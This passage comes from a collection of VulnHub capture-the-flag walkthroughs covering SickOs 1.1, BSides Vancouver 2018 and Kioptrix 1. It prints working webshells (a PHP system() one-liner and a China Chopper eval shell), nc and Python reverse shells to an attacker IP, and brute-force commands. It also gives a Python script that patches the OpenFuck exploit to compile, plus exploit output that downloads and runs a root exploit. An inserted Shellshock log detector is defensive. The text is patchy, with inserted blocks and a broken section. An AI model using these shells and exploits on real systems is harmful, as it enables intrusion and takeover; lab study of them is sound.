Checking application passwords for reuse</h3><p>Look at the wordpress configuration file</p><p>It contains root's account and password</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/11.JPG' alt='' referrerPolicy='no-referrer' /></p><p>This gives root</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/12.JPG' alt='' referrerPolicy='no-referrer' /></p><p>And the other flag</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/13.JPG' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n9642' class='md-header-anchor '></a>Section 11: SickOs 1.1</h1><h2><a name='header-n9643' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n9644' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/sickos/sick0s1.1.7z' target='_blank' class='url'>https://download.vulnhub.com/sickos/sick0s1.1.7z</a></p><h3><a name='header-n9647' class='md-header-anchor '></a>Environment</h3><ul><li>The box is provided as an OVF image and VMware Workstation is officially recommended: download it from Vulnhub and import it into VMware Workstation to run it.</li><li>Target: NAT, IP assigned automatically.</li><li>Attacker: NAT, IP assigned automatically: 192.168.202.128.</li></ul><h3><a name='header-n9658' class='md-header-anchor '></a>Description</h3><p>The goal is to get root and read the file /root/a0216ea4d51874464078c618298b1367.txt.</p><h2><a name='header-n9661' class='md-header-anchor '></a>Information gathering</h2><ul><li>IP discovery</li></ul><p>The target is on the 192.168.202.1/24 segment; an nmap scan finds the target IP: 192.168.202.133.
<img src='https://i.imgur.com/Sa8He6D.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port scan and service identification
A full port scan of the IP:</li></ul><p><img src='https://i.imgur.com/J4QyA5e.png' alt='' referrerPolicy='no-referrer' /></p><p>A squid proxy is in use. Set the browser proxy and visit <a href='http://192.168.202.133/' target='_blank' class='url'>http://192.168.202.133/</a>:
<img src='https://i.imgur.com/TgWO3gi.png' alt='' referrerPolicy='no-referrer' />
The initial conclusion is that vulnerability discovery on the target IP has to go through the proxy.</p><h2><a name='header-n9680' class='md-header-anchor '></a>Web vulnerability discovery</h2><p>Directory brute force through the proxy:
<img src='https://i.imgur.com/ECYErtb.png' alt='' referrerPolicy='no-referrer' /></p><p>Visit robots.txt:
<img src='https://i.imgur.com/540LyET.png' alt='' referrerPolicy='no-referrer' /></p><p>It is wolfcms; the front end is just static pages with nothing to use.
<img src='https://i.imgur.com/8SFGttD.png' alt='' referrerPolicy='no-referrer' /></p><p>The default address <a href='http://192.168.202.133/wolfcms/?/admin/' target='_blank' class='url'>http://192.168.202.133/wolfcms/?/admin/</a> leads to the admin backend:
<img src='https://i.imgur.com/qcutT1t.png' alt='' referrerPolicy='no-referrer' /></p><p>The weak credentials admin/admin get into the backend; the banner shows the cms version is below 0.8.3.1, which may have a file upload vulnerability:
<img src='https://i.imgur.com/9E9RE38.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9696' class='md-header-anchor '></a>Getting a webshell</h2><h3><a name='header-n9697' class='md-header-anchor '></a>Approach 1</h3><p>The backend allows uploading files with any extension; upload a full-featured webshell to get a webshell:
<img src='https://i.imgur.com/jfLyKEn.png' alt='' referrerPolicy='no-referrer' /></p><p>Reading the file directly fails for lack of permissions; there is no output:
<img src='https://i.imgur.com/QfC7XrW.png' alt='' referrerPolicy='no-referrer' /></p><p>Checking the open ports shows 3306 is open, but the mysql version is above 5.1, so udf privilege escalation is not possible:
<img src='https://i.imgur.com/YIMuln3.png' alt='' referrerPolicy='no-referrer' /></p><p>Use the webshell's reverse-shell feature:
<img src='https://i.imgur.com/fJFfkXY.png' alt='' referrerPolicy='no-referrer' />
<img src='https://i.imgur.com/YRV0vtL.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9711' class='md-header-anchor '></a>Approach 2</h3><p>The directory scan also found a cgi-bin directory; a Baidu search suggests it may be affected by the bash vulnerability, which gives a shell directly. Use nc for the reverse shell.</p>
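<p>The cgi-bin finding above is worth a note from the defender's side: with Apache's <code>mod_cgi</code>, request headers become environment variables for the script, and the Shellshock trigger is a bash function definition smuggled into one of them, so it shows up in the access log in the User-Agent or Referer field. The script below is an added example, not from the original page: it parses lines in Apache's combined log format (assumed) and flags those whose attacker-controlled fields carry the <code>() {</code> marker. The log lines are constructed for the demo.</p>

```python
import re
from typing import Dict, List, Optional

# Apache "combined" log format (assumed). Referer and User-Agent are request
# headers, i.e. attacker-controlled, and mod_cgi exports them into the
# script's environment, which is how the bash bug is reached.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A bash function definition at the start of a value: "() {" followed by a
# body. Legitimate header values never look like this.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Fields an attacker controls, in the order they are checked.
CONTROLLED_FIELDS = ("agent", "referer", "request")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it does
    not parse (a malformed line should be reported elsewhere, not trusted)."""
    m = COMBINED_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding if any controlled field carries the marker; also
    record whether the target was a CGI path, where the marker can actually
    reach bash."""
    for field in CONTROLLED_FIELDS:
        if SHELLSHOCK_RE.search(entry[field]):
            return {
                "ip": entry["ip"],
                "time": entry["time"],
                "request": entry["request"],
                "field": field,
                "cgi_target": "/cgi-bin/" in entry["request"],
            }
    return None


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run every parsable line through classify() and collect the findings."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample lines: normal browsing, one probe against a CGI script
# with the marker in the User-Agent, and one line that does not parse.
SAMPLE_LOG = [
    '192.168.202.128 - - [10/Jul/2018:21:04:11 +0800] "GET /wolfcms/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.202.128 - - [10/Jul/2018:21:05:30 +0800] "GET /cgi-bin/status HTTP/1.1" 200 113 "-" "() { :;}; echo probe"',
    '192.168.202.50 - - [10/Jul/2018:21:06:02 +0800] "GET /robots.txt HTTP/1.1" 200 48 "-" "curl/7.58.0"',
    'not a log line',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

<p>The marker is reported wherever it appears, and <code>cgi_target</code> separates probes that could have reached bash from scanner noise against static paths; on the box in question the fix is the patched bash package, and the log check is how you find out whether anyone tried before it was applied.</p>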
<img src='https://i.imgur.com/ySdDGRs.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9715' class='md-header-anchor '></a>提高權限</h2><p>嘗試使用su切換用戶或者sudo直接查看文件,發現沒權限:
<img src='https://i.imgur.com/Pr3iY30.png' alt='' referrerPolicy='no-referrer' /></p><p>Go to the directory where the site is deployed:
<img src='https://i.imgur.com/8nWd3GZ.png' alt='' referrerPolicy='no-referrer' /></p><p>There is a configuration file; with luck it stores a plaintext password:
<img src='https://i.imgur.com/Q24NuxO.png' alt='' referrerPolicy='no-referrer' /></p><p>Connecting to the database with the recovered credentials fails, and logging in as root with the same password fails too.
<img src='https://i.imgur.com/qnjk8X0.png' alt='' referrerPolicy='no-referrer' /></p><p>Listing the system's other users, the sickos account stands out:
<img src='https://i.imgur.com/s3vVfpI.png' alt='' referrerPolicy='no-referrer' /></p><p>Username sickos with password john@123 logs in successfully: the password from the site's configuration file is reused for this local account.
<img src='https://i.imgur.com/RDHnQfj.png' alt='' referrerPolicy='no-referrer' /></p><p>Read the flag with sudo:
<img src='https://i.imgur.com/remDsux.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9737' class='md-header-anchor '></a>Summary of approach</h2><p>1. Get a system shell through the file upload vulnerability or the Bash vulnerability.</p><p>2. A deployed site may store plaintext credentials (database and the like); check its configuration files and try those passwords against local accounts.</p><h1><a name='header-n9742' class='md-header-anchor '></a>Section 12: BSides-Vancouver-2018-Workshop</h1><h2><a name='header-n9743' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n9745' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova' target='_blank' class='url'>https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova</a></p><h3><a name='header-n9748' class='md-header-anchor '></a>Target description</h3><p>The target was built with VirtualBox; the goal is root-level access on it.</p><h3><a name='header-n9751' class='md-header-anchor '></a>Goal</h3><p>Boot to root: obtain root privileges and the flag.</p><h3><a name='header-n9754' class='md-header-anchor '></a>Environment</h3><ul><li>Target: open the VM in VirtualBox with the network adapter in host-only mode, or bridge both the target VM and the Kali VM to the physical machine's wireless adapter. In testing, the VM got no IP address when imported into VMware; imported into VirtualBox it obtained one normally.</li><li>Attacker: a Windows attack machine (the physical host) on the same segment with Nmap, Burp Suite, Wireshark, sqlmap, nc, Hydra, Python 2.7, DirBuster, AWVS, Nessus and similar tools installed. Kali Linux, which ships a full set of penetration tools, works equally well as the attacker.</li></ul><h2><a name='header-n9762' class='md-header-anchor '></a>Information gathering</h2><ul><li>Finding the IP</li></ul><p>Start the VM and sweep the /24 with nmap: <code>nmap -sP 192.168.56.0/24</code>. The target's IP is 192.168.56.101.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port and service identification</li></ul><p>Nmap command: <code>nmap -p1-65535 --open -A 192.168.56.101 -oN BSides.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Open ports and services:</p><table><thead><tr><th>Port</th><th>Service</th><th>Banner</th></tr></thead><tbody><tr><td>21</td><td>FTP</td><td>vsftpd 2.3.5, anonymous login allowed</td></tr><tr><td>22</td><td>ssh</td><td>OpenSSH 5.9p1</td></tr><tr><td>80</td><td>http</td><td>Apache httpd 2.2.22 (Ubuntu)</td></tr></tbody></table><h2><a 
name='header-n9790' class='md-header-anchor '></a>Vulnerability hunting</h2><ul><li>Method one:</li><li>0x01 Anonymous FTP login yields user names</li></ul><p>On Windows, log in to the FTP server anonymously with Xftp. The public directory holds a users.txt.bk file; open it in Notepad:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Five user names: abatchy, john, mai, anne, doomguy</p><ul><li>0x02 SSH brute force with the five user names and a weak-password wordlist</li></ul><p>On Windows, Hydra for Windows or another tool will do; here the "Super Weak Password Checker V1.0" was used. Keep the thread count low (4 threads here), otherwise the VM falls over.</p><p>Wordlist: darkweb2017-top10000.txt.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The brute force yields user anne with password princess.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 Log in over SSH, find sudo rights, get the flag</li></ul><p>Log in with Xshell as anne / princess.</p><p>Running id and sudo -l shows that anne has sudo rights:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Run <code>sudo ls /root</code> and then <code>sudo cat /root/flag.txt</code> to get the flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Method two:</li><li>0x01 Environment setup</li></ul><p>Because a Kali VM is needed, both the bsides VM and the Kali attacker are bridged to the laptop's wireless adapter, so the bsides VM gets a new IP. An Nmap sweep of the wireless adapter's /24 gives the bsides VM's new IP as 172.20.10.8; the Kali VM is 172.20.10.9.</p><p>Nmap command: <code>nmap -sP 172.20.10.0/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Anonymous FTP login again gives the five user names: abatchy, john, mai, anne, doomguy</p><ul><li>0x02 The HTTP service on port 80</li></ul><p>Open <code>http://172.20.10.8/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Open 
<code>http://172.20.10.8/robots.txt</code> and find the /backup_wordpress directory:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Open <code>http://172.20.10.8/backup_wordpress/</code> to reach the WordPress site:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 Scan WordPress with wpscan and brute-force the admin user name and password:</li></ul><p>(1) Enumerate users: <code>wpscan -u http://172.20.10.8/backup_wordpress --enumerate u</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Users found: admin and john</p><p>(2) Brute-force the password with wpscan and a wordlist:</p><p><code>wpscan -u http://172.20.10.8/backup_wordpress --wordlist /root/share/darkweb2017-top10000.txt --username john</code></p><p>The wordlist is again darkweb2017-top10000.txt:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The brute force succeeds: user john, password enigma.</p><h2><a name='header-n9883' class='md-header-anchor '></a>Getting a shell</h2><ul><li>0x04 Log in and get a reverse shell</li></ul><p>(1) Log in to WordPress as john / enigma at <code>http://172.20.10.8/backup_wordpress/wp-login.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) There are several ways to get a shell from WordPress. Go to <code>Appearance -&gt; Editor</code>, pick <code>Theme Header</code> on the right, insert the one-line command-execution shell <code>&lt;?php system($_GET['cmd']); ?&gt;</code> in the editor and save.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Execute commands through the cmd parameter in Burp Suite: requesting <code>172.20.10.8/backup_wordpress/?cmd=id;ls</code> runs id and ls:</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Get a reverse shell with nc by running <code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 172.20.10.5 4444 &gt;/tmp/f</code>. The command must be URL-encoded and then sent from Burp Suite:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) nc on the Windows attacker receives the reverse shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) To make browsing and transferring files easier, drop a China Chopper shell with <code>echo "&lt;?php eval(\$_POST['123456']);?&gt;" &gt;&gt; caidao.php</code> (double quotes on the outside so the inner single quotes survive, and the $ escaped from the shell):</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>China Chopper connects:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9917' class='md-header-anchor '></a>Privilege escalation</h2><ul><li>0x05 Look at the users' files</li></ul><p>(1) Going through each user's files and browsing the directories turns up <code>/usr/local/bin/cleanup</code> with mode 777. Its contents:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>#!/bin/sh</code></p><p><code>rm -rf /var/log/apache2/*    # Clean those damn logs!!</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This script clears the Apache logs and needs root privileges to run.</p><p>Because cleanup is mode 777, anyone can modify and execute it, so its contents can be replaced with a reverse shell that root will then run.</p><p>(2) Edit the cleanup file in China Chopper so that it contains a reverse-shell command. Python 2.7 is installed under <code>/usr/local/lib/python2.7/</code>, so a Python reverse shell works:</p><p><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.5",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Start nc on Windows and wait for the reverse shell; it arrives with root privileges:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Read the flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9950' class='md-header-anchor '></a>Summary of approach</h2><h3><a name='header-n9951' class='md-header-anchor '></a>Breakthroughs and pitfalls</h3><p>1. When there is no obvious way in, brute-force the passwords of the known user names; a wordlist built from foreign (non-Chinese) passwords works better here.</p><p>2. Linux reverse shells come in many flavours (bash, nc, php, Python); try each.</p><p>3. Know the ways of getting a shell from the WordPress admin panel.</p><p>4. The target's author says there are several routes, so others certainly exist; this write-up used two: SSH brute force and WordPress.</p><p> </p><h1><a name='header-n9962' class='md-header-anchor '></a>Section 13: Kioptrix 1</h1><hr /><p>title: Vulnhub penetration testing practice - Kioptrix 1
date: 2018-05-07 15:28:05
categories: Notes</p><h2><a name='header-n9965' class='md-header-anchor '></a>Author: Ukonw</h2><h2><a name='header-n9969' class='md-header-anchor '></a>Information gathering</h2><p>Find the target's IP address with <code>netdiscover</code>.</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# netdiscover 

 Currently scanning: 192.168.63.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.43.1    ac:c1:ee:31:3f:25      1      60  Xiaomi Communications Co L
 192.168.43.33   44:03:2c:68:d8:0f      1      60  Intel Corporate
 192.168.43.54   00:0c:29:7c:3a:16      1      60  VMware, Inc.
</pre><p>The scan gives the target's IP address as <code>192.168.43.54</code>.</p><p>Scan its ports with nmap: <code>nmap -A -sS 192.168.43.54</code></p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS 192.168.43.54
 
Starting Nmap 7.10 ( https://nmap.org ) at 2018-05-07 15:48 
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.43.54
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2018-05-07T07:50:42+00:00; +1m50s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
 
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.43.54
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.99 seconds
</pre><p><code>443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)</code></p><p>Port 443 runs <code>mod_ssl/2.8.4 OpenSSL/0.9.6b</code>.</p><p>Look up known vulnerabilities with <code>searchsploit mod_ssl</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~/Desktop# searchsploit mod_ssl
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache mod_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0. | exploits/unix/remote/40347.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
 
</pre><p>The fourth entry (764.c) is the exploit to use; download it from <code>exploit-db</code>.</p><h2><a name='header-n9987' class='md-header-anchor '></a>Exploitation</h2><h3><a name='header-n9988' class='md-header-anchor '></a>OpenFuck exploit</h3><p>This is a remote overflow. The exploit is old and needs a few changes before it builds:</p><ul><li>Install the OpenSSL 1.0 development library it compiles against: <code>apt-get install libssl1.0-dev</code></li><li>Add the headers <code>&lt;openssl/rc4.h&gt;</code> and <code>&lt;openssl/md5.h&gt;</code> to the exploit</li><li>Replace the URL after <code>wget</code> in the exploit with <code>http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c</code></li><li>At line 961, change the declaration to <code>const unsigned char *p, *end;</code></li></ul><p>Then compile:</p><pre class="md-fences mock-cm md-end-block" lang="">gcc -o OpenFuck 764.c -lcrypto
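</pre><p>The four edits above are mechanical, so here is an added Python script, not part of the original write-up, that applies them to the downloaded 764.c in one go. It assumes the unpatched source has the line <code>unsigned char *p, *end;</code> at the line number the page gives (the page names the line, not its text) and a <code>wget http://.../ptrace-kmod.c</code> token inside the exploit's command string; the sample input at the bottom is a constructed fragment, not the real file.</p>

```python
"""Apply the build fixes for exploit-db 764.c (OpenFuck) listed above.

Added example, not part of the original walkthrough.  Assumptions:
  - the declaration to fix reads exactly 'unsigned char *p, *end;' (the page
    gives only its line number, 961)
  - the ptrace-kmod.c download is a 'wget http://.../ptrace-kmod.c' token
    inside the exploit's command string
"""
import re
import sys

NEW_URL = "http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c"
HEADERS = ["#include <openssl/rc4.h>", "#include <openssl/md5.h>"]


def patch_openfuck(src):
    """Return the patched source.  Safe to run twice: every edit is a no-op
    on already-patched input."""
    out = src

    # 1. Missing headers: insert right after the first #include line.
    missing = [h for h in HEADERS if h not in out]
    if missing:
        out = re.sub(
            r"^(#include\s+<[^>]+>[ \t]*\n)",
            lambda m: m.group(1) + "\n".join(missing) + "\n",
            out,
            count=1,
            flags=re.M,
        )

    # 2. Dead download URL for the ptrace-kmod privilege escalation source.
    out = re.sub(r"wget\s+http://\S+/ptrace-kmod\.c", "wget " + NEW_URL, out)

    # 3. Modern OpenSSL hands back const pointers, so the declaration must be const too.
    out = re.sub(
        r"^([ \t]*)unsigned char \*p, \*end;",
        r"\1const unsigned char *p, *end;",
        out,
        flags=re.M,
    )
    return out


# Constructed stand-in for the relevant lines of 764.c (not the real file).
SAMPLE_SOURCE = (
    "#include <stdio.h>\n"
    "#include <openssl/ssl.h>\n"
    '#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \\n"\n'
    "int get_dh_len(...)\n"
    "{\n"
    "\tunsigned char *p, *end;\n"
    "}\n"
)


def demo():
    """Patch the constructed sample and report which fixes landed."""
    patched = patch_openfuck(SAMPLE_SOURCE)
    return {
        "headers": all(h in patched for h in HEADERS),
        "url": NEW_URL in patched and "packetstormsecurity.nl" not in patched,
        "const": "\tconst unsigned char *p, *end;" in patched,
        "idempotent": patch_openfuck(patched) == patched,
    }


if __name__ == "__main__":
    if len(sys.argv) == 2:
        path = sys.argv[1]
        with open(path) as fh:
            src = fh.read()
        with open(path, "w") as fh:
            fh.write(patch_openfuck(src))
        print("patched %s; now: gcc -o OpenFuck %s -lcrypto" % (path, path))
    else:
        print(demo())
```

<p>Run it with the path to 764.c as its only argument; without arguments it patches the constructed sample and prints which of the four fixes were applied. The real file may have drifted from these assumptions, so check the three regexes against it before trusting the result.</p><pre class="md-fences mock-cm md-end-block" lang="">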
</pre><p>Run <code>./OpenFuck</code> without arguments to list the supported targets and pick the one matching the system.</p><p>Here that is 0x6b.</p><p>Run <code>./OpenFuck 0x6b 192.168.43.54</code>:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.43.54
 
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
 
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f80e0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
--04:04:37--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--04:04:38--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
 
    0K ...                                                   100% @   3.74 MB/s
 
04:04:39 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
 
[+] Attached to 6498
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
